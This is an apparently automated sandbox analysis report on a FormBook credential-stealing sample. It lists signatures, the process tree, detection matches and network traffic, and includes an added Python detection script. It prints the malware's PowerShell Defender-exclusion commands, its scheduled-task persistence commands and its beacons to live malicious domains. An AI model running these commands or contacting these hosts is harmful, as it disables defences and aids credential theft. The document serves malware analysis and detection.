Windows Analysis Report
0t7MXNEfCg.exe

Overview

General Information

Sample name:0t7MXNEfCg.exe
renamed because original name is a hash value
Original sample name:a61ebf9a0414d3871e05be2c7599cee230b5bfd8198c447f276b372c46cd70c9.exe
Analysis ID:1634632
MD5:a682f30885758fe33f03d157985ca8cd
SHA1:d4261970559775da60dc7e5336fa71baead43add
SHA256:a61ebf9a0414d3871e05be2c7599cee230b5bfd8198c447f276b372c46cd70c9
Tags:exeuser-adrian__luca

Detection

FormBook
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 0t7MXNEfCg.exe (PID: 6660 cmdline: "C:\Users\user\Desktop\0t7MXNEfCg.exe" MD5: A682F30885758FE33F03D157985CA8CD)
    • powershell.exe (PID: 6892 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\0t7MXNEfCg.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7084 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 2440 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7124 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HrovwwypYVlFWB" /XML "C:\Users\user\AppData\Local\Temp\tmp476F.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 5900 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • nufnwZ9IW.exe (PID: 4916 cmdline: "C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\ICvX7WbHb46W.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • EhStorAuthn.exe (PID: 3552 cmdline: "C:\Windows\SysWOW64\EhStorAuthn.exe" MD5: 0C9245FDD67B14B9E7FBEBB88C3A5E7F)
          • nufnwZ9IW.exe (PID: 5720 cmdline: "C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\QSqzL0Hw.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 4076 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • HrovwwypYVlFWB.exe (PID: 6448 cmdline: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe MD5: A682F30885758FE33F03D157985CA8CD)
    • schtasks.exe (PID: 6156 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HrovwwypYVlFWB" /XML "C:\Users\user\AppData\Local\Temp\tmp69AD.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7144 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • svchost.exe (PID: 1720 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
Yara matches in memory dumps (Source | Rule | Description | Author):
0000000F.00000002.3311044242.0000000003210000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
0000000F.00000002.3313948379.0000000004F30000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000007.00000002.1092434861.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000010.00000002.3315893341.00000000057F0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000007.00000002.1094683253.00000000011D0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
(5 further memory-dump matches are not expanded in this capture; the full list of ten memory sources appears under AV Detection below.)

Yara matches in unpacked PE files (Source | Rule | Description | Author):
7.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
7.2.RegSvcs.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security

                System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\0t7MXNEfCg.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\0t7MXNEfCg.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\0t7MXNEfCg.exe", ParentImage: C:\Users\user\Desktop\0t7MXNEfCg.exe, ParentProcessId: 6660, ParentProcessName: 0t7MXNEfCg.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\0t7MXNEfCg.exe", ProcessId: 6892, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\0t7MXNEfCg.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\0t7MXNEfCg.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\0t7MXNEfCg.exe", ParentImage: C:\Users\user\Desktop\0t7MXNEfCg.exe, ParentProcessId: 6660, ParentProcessName: 0t7MXNEfCg.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\0t7MXNEfCg.exe", ProcessId: 6892, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HrovwwypYVlFWB" /XML "C:\Users\user\AppData\Local\Temp\tmp69AD.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HrovwwypYVlFWB" /XML "C:\Users\user\AppData\Local\Temp\tmp69AD.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe, ParentImage: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe, ParentProcessId: 6448, ParentProcessName: HrovwwypYVlFWB.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HrovwwypYVlFWB" /XML "C:\Users\user\AppData\Local\Temp\tmp69AD.tmp", ProcessId: 6156, ProcessName: schtasks.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HrovwwypYVlFWB" /XML "C:\Users\user\AppData\Local\Temp\tmp476F.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HrovwwypYVlFWB" /XML "C:\Users\user\AppData\Local\Temp\tmp476F.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\0t7MXNEfCg.exe", ParentImage: C:\Users\user\Desktop\0t7MXNEfCg.exe, ParentProcessId: 6660, ParentProcessName: 0t7MXNEfCg.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HrovwwypYVlFWB" /XML "C:\Users\user\AppData\Local\Temp\tmp476F.tmp", ProcessId: 7124, ProcessName: schtasks.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\0t7MXNEfCg.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\0t7MXNEfCg.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\0t7MXNEfCg.exe", ParentImage: C:\Users\user\Desktop\0t7MXNEfCg.exe, ParentProcessId: 6660, ParentProcessName: 0t7MXNEfCg.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\0t7MXNEfCg.exe", ProcessId: 6892, ProcessName: powershell.exe
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 616, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 1720, ProcessName: svchost.exe
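The Sigma matches above and the process tree at the top of the report describe one loader chain: PowerShell adding a Defender exclusion for the dropper and for its %AppData% copy, schtasks.exe creating a task from an XML file in the user's %TEMP% directory, and argument-less Windows binaries (RegSvcs.exe, EhStorAuthn.exe) started by user-path executables as injection hosts. The following Python is an added example, not code from the Joe Sandbox report or from the Sigma rules it cites, showing how those three signals can be tagged and combined from process-creation events. The events are constructed from the report's process tree; the base64-encoded PowerShell variant given to PID 7084 is an assumed variation (the report's real command for that PID was plaintext) added to show why a plain substring match is not enough.

```python
"""Added example (not from the Joe Sandbox report): tag Windows process-creation
events for the loader chain this report shows. Field names follow the Sigma-style
fields in the report (Image, CommandLine, ParentImage)."""
import base64
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    image: str          # full path of the new process
    command_line: str
    parent_image: str   # full path of the parent; "" if unknown (as for the BITS svchost)


DEFENDER_EXCLUSION_RE = re.compile(
    r"Add-MpPreference\b.*?-Exclusion(?:Path|Process|Extension)\b", re.IGNORECASE)
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob of a UTF-16LE script
ENCODED_CMD_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def effective_command(command_line: str) -> str:
    """Decoded script when PowerShell was given -EncodedCommand, else the raw line."""
    m = ENCODED_CMD_RE.search(command_line)
    if not m:
        return command_line
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="ignore")
    except ValueError:  # binascii.Error is a ValueError subclass
        return command_line


def args_after_image(command_line: str) -> str:
    """Everything after the (optionally quoted) image token; '' means no arguments."""
    m = re.match(r'^\s*(?:"[^"]*"|\S+)\s*(.*)$', command_line)
    return m.group(1) if m else ""


def under(path: str, prefix: str) -> bool:
    return path.lower().startswith(prefix.lower())


def is_defender_exclusion(ev: ProcEvent) -> bool:
    """PowerShell adding a Defender exclusion, plaintext or base64-encoded."""
    return (ev.image.lower().endswith("powershell.exe")
            and DEFENDER_EXCLUSION_RE.search(effective_command(ev.command_line)) is not None)


def is_schtasks_xml_from_temp(ev: ProcEvent) -> bool:
    """schtasks /Create fed a task definition from the user's %TEMP% directory."""
    if not ev.image.lower().endswith("schtasks.exe"):
        return False
    cl = ev.command_line.lower()
    return "/create" in cl and "/xml" in cl and "\\appdata\\local\\temp\\" in cl


def is_windows_binary_no_args_user_parent(ev: ProcEvent) -> bool:
    """A Windows-shipped binary started with no arguments by a parent outside C:\\Windows
    (an unknown parent counts as outside): the shape of RegSvcs.exe and EhStorAuthn.exe
    being used as hollowing targets here. Noisy alone; weigh it with the other signals."""
    return (under(ev.image, "C:\\Windows\\")
            and args_after_image(ev.command_line) == ""
            and not under(ev.parent_image, "C:\\Windows\\"))


RULES = {
    "defender_exclusion": is_defender_exclusion,
    "schtasks_xml_from_temp": is_schtasks_xml_from_temp,
    "windows_binary_no_args_user_parent": is_windows_binary_no_args_user_parent,
}


def tag_events(events):
    """Map PID -> list of rule names that fired for that process start."""
    return {ev.pid: [name for name, rule in RULES.items() if rule(ev)] for ev in events}


def verdict(tags, min_distinct=2) -> str:
    """Two or more distinct techniques in one trace is treated as a loader chain."""
    distinct = {t for names in tags.values() for t in names}
    return "loader chain" if len(distinct) >= min_distinct else "no chain"


POWERSHELL = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
DROPPER = r"C:\Users\user\Desktop\0t7MXNEfCg.exe"
# Assumed variant, not in the report: the same cmdlet hidden behind -EncodedCommand.
ENCODED = base64.b64encode(
    'Add-MpPreference -ExclusionPath "C:\\Users\\user\\AppData\\Roaming\\HrovwwypYVlFWB.exe"'
    .encode("utf-16-le")).decode()

# Sample events constructed from the report's process tree.
SAMPLE_EVENTS = [
    ProcEvent(6892, POWERSHELL,
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\0t7MXNEfCg.exe"',
              DROPPER),
    ProcEvent(6916, r"C:\Windows\System32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1", POWERSHELL),
    ProcEvent(7084, POWERSHELL, '"%s" -EncodedCommand %s' % (POWERSHELL, ENCODED), DROPPER),
    ProcEvent(7124, r"C:\Windows\SysWOW64\schtasks.exe",
              r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HrovwwypYVlFWB" /XML "C:\Users\user\AppData\Local\Temp\tmp476F.tmp"',
              DROPPER),
    ProcEvent(5900, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
              r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"', DROPPER),
    ProcEvent(3552, r"C:\Windows\SysWOW64\EhStorAuthn.exe", r'"C:\Windows\SysWOW64\EhStorAuthn.exe"',
              r"C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\ICvX7WbHb46W.exe"),
    ProcEvent(1720, r"C:\Windows\System32\svchost.exe",
              r"C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS", ""),
]

if __name__ == "__main__":
    tags = tag_events(SAMPLE_EVENTS)
    for pid, names in tags.items():
        print(pid, names or "-")
    print(verdict(tags))
```

The third rule is deliberately broad (any argument-less Windows binary with a non-Windows parent) and is only useful in combination: on its own it also fires on a user application launching notepad.exe, which is why `verdict` asks for two distinct techniques rather than any single hit.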

                Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HrovwwypYVlFWB" /XML "C:\Users\user\AppData\Local\Temp\tmp476F.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HrovwwypYVlFWB" /XML "C:\Users\user\AppData\Local\Temp\tmp476F.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\0t7MXNEfCg.exe", ParentImage: C:\Users\user\Desktop\0t7MXNEfCg.exe, ParentProcessId: 6660, ParentProcessName: 0t7MXNEfCg.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HrovwwypYVlFWB" /XML "C:\Users\user\AppData\Local\Temp\tmp476F.tmp", ProcessId: 7124, ProcessName: schtasks.exe
                No Suricata rule has matched

                AV Detection

Source: 0t7MXNEfCg.exe | Avira: detected
Source: http://www.publicblockchain.xyz/lp5v/?Fvul3V4=7yIrJbTkKXcZ3P0KGr/Koo24hNJO/SgHVLeScBlqQKklxLvgBpJLKramFPJZQILeALwCbIGrsNSTHBUkDfJ2CmxW9ppwC0dBf2zpzGJzUmZuPq9zPg==&Y4dP=e0rhoTXHczC | Avira URL Cloud: Label: malware
Source: http://www.quo1ybjmkhdqljoz.top/19my/?Fvul3V4=joqcG+fZarPVQJ7S+4ZxvY2vtL9RD/Utjvk256BrCJs1qxhBI0rorZURoJn8TQLNAH2gxgdx7fps/CVRzREwYN3vr/HATwYeIEwtGpG51RR/HtBrWQ==&Y4dP=e0rhoTXHczC | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe | Avira: detection malicious, Label: TR/Kryptik.ckmuj
Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe | ReversingLabs: Detection: 87%
Source: 0t7MXNEfCg.exe | Virustotal: Detection: 75%
Source: 0t7MXNEfCg.exe | ReversingLabs: Detection: 87%
Source: Yara match | File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000F.00000002.3311044242.0000000003210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.3313948379.0000000004F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.1092434861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.3315893341.00000000057F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.1094683253.00000000011D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.1094905703.00000000044D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.3313869495.0000000004EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.3313912525.0000000005FC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability

                Compliance

Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Unpacked PE file: 0.2.0t7MXNEfCg.exe.c70000.0.unpack
Source: 0t7MXNEfCg.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0t7MXNEfCg.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: EhStorAuthn.pdbGCTL | source: RegSvcs.exe, 00000007.00000002.1092861532.0000000000948000.00000004.00000020.00020000.00000000.sdmp, nufnwZ9IW.exe, 0000000D.00000002.3312326160.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: RegSvcs.pdb, | source: EhStorAuthn.exe, 0000000F.00000002.3312040086.000000000355A000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.000000000576C000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000000.1158675658.00000000033BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.1394289093.000000001313C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP | source: RegSvcs.exe, 00000007.00000002.1093299321.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000003.1092408126.0000000004DED000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000003.1094405634.0000000004F95000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314113769.00000000052DE000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314113769.0000000005140000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: RegSvcs.exe, RegSvcs.exe, 00000007.00000002.1093299321.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000003.1092408126.0000000004DED000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000003.1094405634.0000000004F95000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314113769.00000000052DE000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314113769.0000000005140000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: EhStorAuthn.pdb | source: RegSvcs.exe, 00000007.00000002.1092861532.0000000000948000.00000004.00000020.00020000.00000000.sdmp, nufnwZ9IW.exe, 0000000D.00000002.3312326160.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: RegSvcs.pdb | source: EhStorAuthn.exe, 0000000F.00000002.3312040086.000000000355A000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.000000000576C000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000000.1158675658.00000000033BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.1394289093.000000001313C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: nufnwZ9IW.exe, 0000000D.00000000.1013826041.000000000013F000.00000002.00000001.01000000.0000000B.sdmp, nufnwZ9IW.exe, 00000010.00000002.3311041959.000000000013F000.00000002.00000001.01000000.0000000B.sdmp
Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Code function: 4x nop then jmp 0B029FC6h | 0_2_0B029591
Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Code function: 4x nop then mov eax, dword ptr [ebp-28h] | 0_2_0B02A758
Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe | Code function: 4x nop then jmp 0AB193A6h | 8_2_0AB18971

                Networking

                Source: DNS query: www.031233435.xyz
                Source: DNS query: www.publicblockchain.xyz
                Source: DNS query: www.multo.xyz
Source: global traffic | TCP traffic: 192.168.2.9:53457 -> 162.159.36.2:53
Source: Joe Sandbox View | IP Address: 144.76.229.203
Source: Joe Sandbox View | IP Address: 23.29.115.2
Source: Joe Sandbox View | ASN Name: HETZNER-ASDE
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2 (4 occurrences)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (14 occurrences)
Source: global traffic | HTTP traffic detected: GET /wuv4/?Y4dP=e0rhoTXHczC&Fvul3V4=2OIhpue752EZ90/IvIOXIVPMrLw233bVQ3MPFxfgDOdW1S8/arxwgjd2lghQxPvp+gghQveeWAHTWLXRjOMCWPWMwADxip7rw5uuigB1f8O0pqS8IA== HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.loonerverse.app | User-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
Source: global traffic | HTTP traffic detected: GET /esw3/?Fvul3V4=STIHOi9CYFClakjV40da904kxu04fSTg15TVg9rRTe6RIWG0ngBkAmIpkbb4lCp8vZ5PbVNvG6nxo4giTwSjUUdGf0sNI49aD0h2s8CD3wRIEi64PA==&Y4dP=e0rhoTXHczC HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.primepath.net | User-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
Source: global traffic | HTTP traffic detected: GET /frae/?Y4dP=e0rhoTXHczC&Fvul3V4=KcpF0TU1XcHay6iLVQUXGDReeie9um98isUAx1G3kizVKrvyU48KAqtS1EQtSF28ARfeHCcJEKKBEr6rT3kkp32obJR11ZCNpl9EOmwTtKX1kru6/Q== HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.031233435.xyz | User-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
Source: global traffic | HTTP traffic detected: GET /19my/?Fvul3V4=joqcG+fZarPVQJ7S+4ZxvY2vtL9RD/Utjvk256BrCJs1qxhBI0rorZURoJn8TQLNAH2gxgdx7fps/CVRzREwYN3vr/HATwYeIEwtGpG51RR/HtBrWQ==&Y4dP=e0rhoTXHczC HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.quo1ybjmkhdqljoz.top | User-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
Source: global traffic | HTTP traffic detected: GET /lp5v/?Fvul3V4=7yIrJbTkKXcZ3P0KGr/Koo24hNJO/SgHVLeScBlqQKklxLvgBpJLKramFPJZQILeALwCbIGrsNSTHBUkDfJ2CmxW9ppwC0dBf2zpzGJzUmZuPq9zPg==&Y4dP=e0rhoTXHczC HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.publicblockchain.xyz | User-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
